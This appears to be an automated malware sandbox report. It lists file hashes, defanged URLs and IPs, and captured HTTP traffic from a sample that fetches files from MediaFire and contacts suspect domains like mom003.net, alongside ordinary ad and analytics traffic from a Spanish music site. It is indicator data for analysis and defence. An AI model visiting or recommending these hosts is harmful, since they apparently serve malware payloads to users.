d181a14d38ab2b06fc43bd44c06d7f84
abbf06cffc11ca3753afc685f606c4e5
2d1fc41ea48b9214976d9c6e2c4db70e
e221dbe5a8a24f9b46b4c4730c49df82

Network Activity

URLs

URL	IP
hxxp://api.wipmania.com/	68.64.170.190
hxxp://www.mediafire.com/download/bg4jdeppib94ych/empileque.hfg	205.196.120.6
hxxp://download627.mediafire.com/wj53lrzxv7lg/bg4jdeppib94ych/empileque.hfg	205.196.120.75
hxxp://www.mediafire.com/download/icv44fwz74gj29z/hgf678.hfg	205.196.120.6
hxxp://download627.mediafire.com/lmpb2mr1rucg/icv44fwz74gj29z/hgf678.hfg	205.196.120.75
hxxp://mi.2papa.us/	162.210.197.44
hxxp://mi.2papa.us/Poemas/	162.210.197.44
hxxp://mi.2papa.us/Estilos/CSS.Sitio.css	162.210.197.44
hxxp://mi.2papa.us/Estilos/CSS.Panel.css	162.210.197.44
hxxp://mi.2papa.us/Js/Principal.js	162.210.197.44
hxxp://mi.2papa.us/Js/Funciones.js	162.210.197.44
hxxp://mi.2papa.us/Js/swfobject.js	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i-2i.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i.b07.gif	162.210.197.44
hxxp://mi.2papa.us/principal.swf	162.210.197.44
hxxp://a23.dscg10.akamai.net/2454.html?s=300x250
hxxp://whos.amung.us/swidget/h20d2qja0b7p.gif	67.202.94.94
hxxp://www-google-analytics.l.google.com/ga.js
hxxp://www-google-analytics.l.google.com/__utm.gif?utmwv=5.5.0&utms=1&utmn=1057111011&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=941485037&utmr=-&utmp=/Poemas/&utmht=1398081328964&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)\|utmccn=(direct)\|utmcmd=(none);&utmu=q~
hxxp://mi.2papa.us/Imagenes/i_26.gif	162.210.197.44
hxxp://widgets.amung.us/small/05/560.png	173.192.200.70
hxxp://ds-any-world.ngd.ysm.yahoodns.net/st?ad_type=ad&ad_size=300x250&section=5397210
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.7235460356268475&u=http://esmusicon.com/Poemas/
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.8804630965534756&u=http://esmusicon.com/Poemas/
hxxp://mi.2papa.us/Imagenes/f.gif	162.210.197.44
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.8022853591730279&u=http://esmusicon.com/Poemas/
hxxp://ds-any-world.ngd.ysm.yahoodns.net/get-user-id?ver=2&s=5397210&ts=1398081449&sig=b42daf690844303b
hxxp://mi.2papa.us/Imagenes/i.f06.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/e_17.gif	162.210.197.44
hxxp://ds-any-world.ngd.ysm.yahoodns.net/imp?Z=300x250&s=5397210&_salt=3369660399&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0
hxxp://mi.2papa.us/Imagenes/i_13.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i_15.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i_28.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i_58.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i-play.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/lyrics_ico.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/videos_ico.gif	162.210.197.44
hxxp://a1174.g.akamai.net/atoms/c8/3b/51/0b/c83b510be812cec3ea3446015eb76621.gif
hxxp://mi.2papa.us/Imagenes/twitter.png	162.210.197.44
hxxp://mi.2papa.us/Imagenes/facebook.png	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i_02.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i_08.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/ii_13.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/-4524f.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/syij4.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/ii_14.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/vineta.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/fondo_icos.gif	162.210.197.44
hxxp://mi.2papa.us/static.img/img/i-21.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i_82.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i_84.gif	162.210.197.44
hxxp://mi.2papa.us/Imagenes/i_86.gif	162.210.197.44
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.14030898417391835&u=http://esmusicon.com/
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.8917821187154981&u=http://esmusicon.com/
hxxp://ds-any-world.ngd.ysm.yahoodns.net/get-user-id?ver=2&s=5397210&ts=1398081463&sig=076f97ecda33a47a
hxxp://ds-any-world.ngd.ysm.yahoodns.net/imp?Z=300x250&s=5397210&_salt=2659402730&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0
hxxp://a71.dscg10.akamai.net/pixel.gif?id=5397210&r=0.0038873341277975703&u=http://esmusicon.com/
hxxp://a1174.g.akamai.net/atoms/c5/f8/76/0e/c5f8760e7af5ff75c20de7295e421a6f.png
hxxp://ds-any-world.ngd.ysm.yahoodns.net/imp?Z=300x250&s=5397210&_salt=1531230313&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0
hxxp://ds-any-world.ngd.ysm.yahoodns.net/get-user-id?ver=2&s=5397210&ts=1398081464&sig=616b1a54b12efba8
hxxp://a1174.g.akamai.net/atoms/fa/1b/6b/97/fa1b6b9794e5b240bbad703d9f4c9a12.png
hxxp://www-google-analytics.l.google.com/__utm.gif?utmwv=5.5.0&utms=2&utmn=1447428280&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=200558968&utmr=-&utmp=/&utmht=1398081346167&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)\|utmccn=(direct)\|utmcmd=(none);&utmu=q~
hxxp://widgets.amung.us/small/05/567.png	173.192.200.70
hxxp://esmusicon.com/Imagenes/i_58.gif	162.210.197.44
hxxp://www.google-analytics.com/__utm.gif?utmwv=5.5.0&utms=2&utmn=1447428280&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=200558968&utmr=-&utmp=/&utmht=1398081346167&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)\|utmccn=(direct)\|utmcmd=(none);&utmu=q~	204.9.80.37
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.7235460356268475&u=http://esmusicon.com/Poemas/	204.95.26.185
hxxp://esmusicon.com/Imagenes/vineta.gif	162.210.197.44
hxxp://www.google-analytics.com/ga.js	204.9.80.37
hxxp://content.yieldmanager.edgesuite.net/atoms/c5/f8/76/0e/c5f8760e7af5ff75c20de7295e421a6f.png	205.237.69.88
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.0038873341277975703&u=http://esmusicon.com/	204.95.26.185
hxxp://esmusicon.com/static.img/img/i-21.gif	162.210.197.44
hxxp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081464&sig=616b1a54b12efba8	98.139.225.42
hxxp://content.yieldmanager.edgesuite.net/atoms/fa/1b/6b/97/fa1b6b9794e5b240bbad703d9f4c9a12.png	205.237.69.88
hxxp://ads.yahoo.com/st?ad_type=ad&ad_size=300x250&section=5397210	98.139.225.42
hxxp://esmusicon.com/Imagenes/facebook.png	162.210.197.44
hxxp://esmusicon.com/principal.swf	162.210.197.44
hxxp://content.yieldmanager.edgesuite.net/atoms/c8/3b/51/0b/c83b510be812cec3ea3446015eb76621.gif	205.237.69.88
hxxp://esmusicon.com/Imagenes/i_26.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/i.b07.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/i_13.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/lyrics_ico.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/-4524f.gif	162.210.197.44
hxxp://esmusicon.com/Js/Principal.js	162.210.197.44
hxxp://u.pub-fit.com/2454.html?s=300x250	204.93.43.26
hxxp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=2659402730&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0	98.139.225.42
hxxp://esmusicon.com/Imagenes/i_28.gif	162.210.197.44
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.8917821187154981&u=http://esmusicon.com/	204.95.26.185
hxxp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=1531230313&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0	98.139.225.42
hxxp://esmusicon.com/Imagenes/videos_ico.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/i-play.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/i.f06.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/e_17.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/i_84.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/ii_14.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/i_02.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/i_86.gif	162.210.197.44
hxxp://esmusicon.com/	162.210.197.44
hxxp://esmusicon.com/Imagenes/i_15.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/ii_13.gif	162.210.197.44
hxxp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=3369660399&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0	98.139.225.42
hxxp://esmusicon.com/Imagenes/fondo_icos.gif	162.210.197.44
hxxp://esmusicon.com/Js/Funciones.js	162.210.197.44
hxxp://esmusicon.com/Imagenes/i_82.gif	162.210.197.44
hxxp://esmusicon.com/Js/swfobject.js	162.210.197.44
hxxp://esmusicon.com/Poemas/	162.210.197.44
hxxp://esmusicon.com/Imagenes/f.gif	162.210.197.44
hxxp://esmusicon.com/Estilos/CSS.Panel.css	162.210.197.44
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.14030898417391835&u=http://esmusicon.com/	204.95.26.185
hxxp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081463&sig=076f97ecda33a47a	98.139.225.42
hxxp://esmusicon.com/Estilos/CSS.Sitio.css	162.210.197.44
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.8804630965534756&u=http://esmusicon.com/Poemas/	204.95.26.185
hxxp://www.google-analytics.com/__utm.gif?utmwv=5.5.0&utms=1&utmn=1057111011&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=941485037&utmr=-&utmp=/Poemas/&utmht=1398081328964&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)\|utmccn=(direct)\|utmcmd=(none);&utmu=q~	204.9.80.37
hxxp://esmusicon.com/Imagenes/i-2i.gif	162.210.197.44
hxxp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081449&sig=b42daf690844303b	98.139.225.42
hxxp://esmusicon.com/Imagenes/syij4.gif	162.210.197.44
hxxp://esmusicon.com/Imagenes/twitter.png	162.210.197.44
hxxp://px.pub-fit.com/pixel.gif?id=5397210&r=0.8022853591730279&u=http://esmusicon.com/Poemas/	204.95.26.185
hxxp://esmusicon.com/Imagenes/i_08.gif	162.210.197.44
mom003.net	37.0.123.87
mom002.net

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /ga.js HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.google-analytics.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 21 Apr 2014 02:16:24 GMT

Expires: Mon, 21 Apr 2014 14:16:24 GMT

Last-Modified: Thu, 10 Apr 2014 18:45:31 GMT

X-Content-Type-Options: nosniff

Content-Type: text/javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Server: Golfe2

Content-Length: 15798

Age: 34865

Cache-Control: public, max-age=43200

Alternate-Protocol: 80:quic

...........}kw.:............Io@R...........,Y..4..N/......$[NR.s.Y.........h43v..@.....~...*....a$.|>>..G....,... ..:...<Hdz....$e..:........^1..H....BV...Y....t2..r.8..y...,...(r<...8W|....%DX.&..g4I.......$u.5..^GH...g,G=.....x.. .........W|.............. ...c.......2F.........%O.QO.....#.z.B..UtX;p....6...!V...9<K..A.awP'9hc.{H>....a...,..../:....Q.^.2H.}.pt:..x.c.A...CL...)4..........1.A.Y.od.}.....j,....f.&......Q...........w.8........~x'..<.*...`_.^r..>t!$ .j....q..N....V...M.).4` .r.......O..(.L..@. .>..v.C ......VJ._[[........~"..e...7-..C..y.*.K.I....Y.2!.R.a..i^R...-q..LG......:8.?.?.?R....>o....{<....[..!2o....V.....b..q7kE...'....n?.~...../..A4....vL3[.._....q.......].JG..\.......q....w.YV1..>..`..Q.cC.`..0...\u.:.'.....L.$.1.\O.7n..7.=.O.r'..d.,.y..Kh..,.J.<..na...$..b.X....T..y>OS.....Vxu...e......e.e.x ..[..K.d.D..*....1..Nm."x...I..e...........>....\c......J..&c..J.;@...Q.....j...<......y..J...#>.....>........t.....Y>..Yk..@e..v.Cf5....7.....(.......$\.R.......wz.I.......6..:A>..g..[..o../..M'.....y.6*..]H.5`i*...Q..O.%4T ...;.....#J.........xkk.&..^N../[......As.E....W....5.*MG....z......6.w......p..['Bg.~T..2....U..@@.`.u..T...Z.................Z....|.F.........M.&...k._v]T.M..,/....4.$.8..X.`...qm-\[.q..C..l...I|>>UJ.}.k.4."... e...v.......&.....jSm.....RH..m.9..si|kP .xVQ......-.V.v..j..z6.`\!.`.6`c73..2....y.......p...l..._..=o......k....<v ..'.bX7.e..R9.....Ym5..e.PE.zA.....y.. ...B"R...Qy.....g7..hp...fK./...O.c.,R....^3

<<

<<< skipped >>>

GET /__utm.gif?utmwv=5.5.0&utms=1&utmn=1057111011&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=941485037&utmr=-&utmp=/Poemas/&utmht=1398081328964&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.google-analytics.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Pragma: no-cache

Expires: Wed, 19 Apr 2000 11:43:00 GMT

Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

Date: Mon, 14 Apr 2014 17:12:35 GMT

Server: Golfe2

Content-Length: 35

Age: 585894

Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate

Alternate-Protocol: 80:quic

GIF89a.............,...........D..;HTTP/1.1 200 OK..Pragma: no-cache..Expires: Wed, 19 Apr 2000 11:43:00 GMT..Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT..X-Content-Type-Options: nosniff..Content-Type: image/gif..Date: Mon, 14 Apr 2014 17:12:35 GMT..Server: Golfe2..Content-Length: 35..Age: 585894..Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate..Alternate-Protocol: 80:quic..GIF89a.............,...........D..;....

GET /__utm.gif?utmwv=5.5.0&utms=2&utmn=1447428280&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=200558968&utmr=-&utmp=/&utmht=1398081346167&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.google-analytics.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Pragma: no-cache

Expires: Wed, 19 Apr 2000 11:43:00 GMT

Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

Date: Mon, 14 Apr 2014 17:12:35 GMT

Server: Golfe2

Content-Length: 35

Age: 585911

Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate

Alternate-Protocol: 80:quic

GIF89a.............,...........D..;HTTP/1.1 200 OK..Pragma: no-cache..Expires: Wed, 19 Apr 2000 11:43:00 GMT..Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT..X-Content-Type-Options: nosniff..Content-Type: image/gif..Date: Mon, 14 Apr 2014 17:12:35 GMT..Server: Golfe2..Content-Length: 35..Age: 585911..Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate..Alternate-Protocol: 80:quic..GIF89a.............,...........D..;..

GET /download/bg4jdeppib94ych/empileque.hfg HTTP/1.1

User-Agent: Mozilla/4.0

Host: VVV.mediafire.com

HTTP/1.1 302

Date: Mon, 21 Apr 2014 11:57:17 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: close

Cache-control: no-cache

Expires: 0

Location: hXXp://download627.mediafire.com/wj53lrzxv7lg/bg4jdeppib94ych/empileque.hfg

Pragma: no-cache

Set-Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc; expires=Mon, 21-Mar-2016 11:57:17 GMT; path=/; domain=.mediafire.com; httponly

Server: MediaFire

Access-Control-Allow-Origin: *

0..

GET /Poemas/ HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:26 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 130866

Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT

Connection: keep-alive

ETag: "5342d9c0-1ff32"

Accept-Ranges: bytes

.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">. <head>. <title>Musica Online</title>. <meta name='title' content="Musica Online">. <meta name='description' content="Musica Online tiene un gran repertorio de musica en linea, disfruta de la canciones que mas suenan en la disco, mira los videos y letras de tus canciones favoritas">. <meta name='keywords' content="MUSICA ONLINE,ESCUCHAR MUSICA, MUSICA EN LINEA">. <meta name="robots" content="index, follow"/>. <meta name="author" content="Musica Online"/>. <meta name="copyright" content="Musica Online 2012 Derechos Reservados"/>. <meta http-equiv="Content-Language" content="es"/>. <meta name="revisit" content="1 days"/>. <meta NAME="googlebot" content="index, follow" />. <base href="hXXp://esmusicon.com/" />. <META HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />. <link href="./Estilos/CSS.Sitio.css" rel="stylesheet" type="text/css" />. <link href="./Estilos/CSS.Panel.css" rel="stylesheet" type="text/css" />. <script type="text/javascript" src="Js/Principal.js"></script&g

<<

<<< skipped >>>

GET /Js/Principal.js HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:27 GMT

Content-Type: application/x-javascript; charset=utf-8

Content-Length: 6765

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-1a6d"

Accept-Ranges: bytes

// Coddigo Javascript By Andy (^_^)!.var actual;.var musicax;.var action;.var posps;.function Swf(path) { .var swf = navigator.appName.indexOf("Microsoft") != -1; .return (swf) ? window[path] : document[path];.}.function $(objeto){. return document.getElementById(objeto);..}.function valor(objeto){..return $(objeto).value;.}.function sug(e,obj){...var actualsug = e-1;..$(obj).focus();..$('f-' e).innerHTML = "<span class='fr-1' style='position:absolute'></span><span class='fr-2'>" sugerencias[actualsug] "</span>"; ...}.function ocu(e){. $('f-' e).innerHTML = ''; .}.function gen(val){for(i=0;i<val.length;i )if(val[i].checked) return val[i].value;}.function peticionXMLHttp() {. var peticion = false;. if (window.XMLHttpRequest) . { . peticion = new XMLHttpRequest(); . } . else . if (window.ActiveXObject) { . try { peticion = new ActiveXObject("Msxml2.XMLHTTP"); } . catch (e) {. try { peticion = new ActiveXObject("Microsoft.XMLHTTP"); } . catch (e) {}. }. }. . return peticion; . .}..function paginar(numpag){..var paginacion;..var anterior = numpag-1;..var siguiente = numpag 1;..var eltotal = $('listaArtistas').getElementsByTagName('li').length; ..var paginasentotal = Math.ceil(eltotal/40);..../* Enlace Adicional */..if(numpag <=paginasentotal-1)..paginacion = "<div style='margin-left:40px'><a class=t2 href='' onclick=\"paginar(" siguiente "); return false\" title='Más arti

<<

<<< skipped >>>

GET /Js/swfobject.js HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:28 GMT

Content-Type: application/x-javascript; charset=utf-8

Content-Length: 8880

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-22b0"

Accept-Ranges: bytes

/**.. * SWFObject v2.0: Flash Player detection and embed - hXXp://blog.deconcept.com/swfobject/.. *.. * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:.. * hXXp://VVV.opensource.org/licenses/mit-license.php.. *.. */..if(typeof deconcept == "undefined") var deconcept = new Object();..if(typeof deconcept.util == "undefined") deconcept.util = new Object();..if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object();..deconcept.SWFObject = function(swf, id, w, h, ver, c, quality, xiRedirectUrl, redirectUrl, detectKey) {...if (!document.getElementById) { return; }...this.DETECT_KEY = detectKey ? detectKey : 'detectflash';...this.skipDetect = deconcept.util.getRequestParameter(this.DETECT_KEY);...this.params = new Object();...this.variables = new Object();...this.attributes = new Array();...if(swf) { this.setAttribute('swf', swf); }...if(id) { this.setAttribute('id', id); }...if(w) { this.setAttribute('width', w); }...if(h) { this.setAttribute('height', h); }...if(ver) { this.setAttribute('version', new deconcept.PlayerVersion(ver.toString().split("."))); }...this.installedVer = deconcept.SWFObjectUtil.getPlayerVersion();...if (!window.opera && document.all && this.installedVer.major > 7) {....// only add the onunload cleanup if the Flash Player version supports External Interface and we are in IE....deconcept.SWFObject.doPrepUnload = true;...}...if(c) { this.addParam('bgcolor', c); }...var q = quality ? quality : 'high';...this.addParam('quality', q);...thi

<<

<<< skipped >>>

GET /Imagenes/i.b07.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:28 GMT

Content-Type: image/gif

Content-Length: 762

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-2fa"

Accept-Ranges: bytes

GIF89a,......ONNgfdA@@===;;;???...CCC...........|......GGFJJI.........IIH...EED..}]][......lminnkrroYYW.........zyu==<.....~...RRRZZX__]..~...kjhppm...kki............XXWLLL.........///000NNNJJJMLL777444111KKKHHHEEE999FFF666...333........................................................................................................................................................................!.......,....,........%) .........!/.-3.........6.:........&<........@........;........A........D........B..........4F... F.......(.F.5.1........F.......@A@#....@.a.#....!.......(0a.......i...v.. h.!....7.......3!....@N#.h..`..J.'....a...8....oA.#..<.zu.T#..,0. ........u.T.CW...K....w{...........L......'.......#K.|.....3k.......C..M.t...S.^...k.EF..A.....s..}#..;....

GET /principal.swf HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://esmusicon.com/Poemas/

x-flash-version: 11,6,602,168

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:28 GMT

Content-Type: application/x-shockwave-flash

Content-Length: 116150

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-1c5b6"

Accept-Ranges: bytes

FWS.....p.........N.D.....C......%.....`.>..>.........fff.5....D.t..C.t.....................@...?.........BoundingBox...........@...?.........Defaults...........@...?.........UIObjectExtensions...,.......?.......@..........0................@...?.........UIObject...!....._.D................3.C..s..r.@...$....._.D.............3..5hp.|.s..r.ND8...=..........................$.............this......tabHandler.R............?......@...............&.....boundingBox_mc.@...?.........FocusRect...N.......?.........&.....tabCapture.........@...............................r..@...?.........FocusManager...........@...?.........UIComponentExtensions...9.......?.......@..........N........................1Qh..@...?.........UIComponent...#.....@.@............c....6T4...g4.lg....'.....@.@......M......SeCB...j=h....0mFm ....q.......?.[.......themeColor..this...........mx......skins.N....ColoredSkinElement.N....setColorStyle.R..........@...?.........ProgBarCapThemeColor.?. .....8............K.P................t,.........X.........................@..P.i.@............. ...6.i.@..h..........`..y.i.@...........@...?.........ProgBarRight...&.....@.@...............AM...#.5...cV.`...?. .....9E.........JX. P................t....f.....P.......................i.@............. ...Xi.@..h..........`....i.@...........@...?.........ProgBarLeft.........P.............L...d8'..............P.........M...H....4T.F4l...w.......?.[.......themeColor..this...........mx......skins.N....ColoredSkinElement.N....setColorStyle.R............P...@...?.....

<<

<<< skipped >>>

GET /Imagenes/i_26.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: esmusicon.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Mon, 21 Apr 2014 11:57:29 GMT

Content-Type: image/gif

Content-Length: 573

Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT

Connection: keep-alive

ETag: "515a39e9-23d"

Accept-Ranges: bytes

GIF89a................}}}.........uuu...mmm...........................aaa.....................jjj...yyyVVV.................................___..............................|||^^^...fff.....................!.......,.............px ....ry.....FG.Z.X..BY:.E.&K.W1..7w.,.p...\;.qY..p ..{:...U..N0......T~F_ ..663.:$MN.{..6* ...C&q...6./...Bxf...".,G...68...-.5'(..%..1!..T#4.).......U.8..U......:....T....6.T....8.t.../...:..kG... ..R..........He.....!d.....T...x1...:..K...I.&..|7.cHZ~..y.h.dJ...4....NL....H.......4.p@O....P.4a@..t.E0.a...p...@.B.... .....U..hKO..... ^.X\..;....

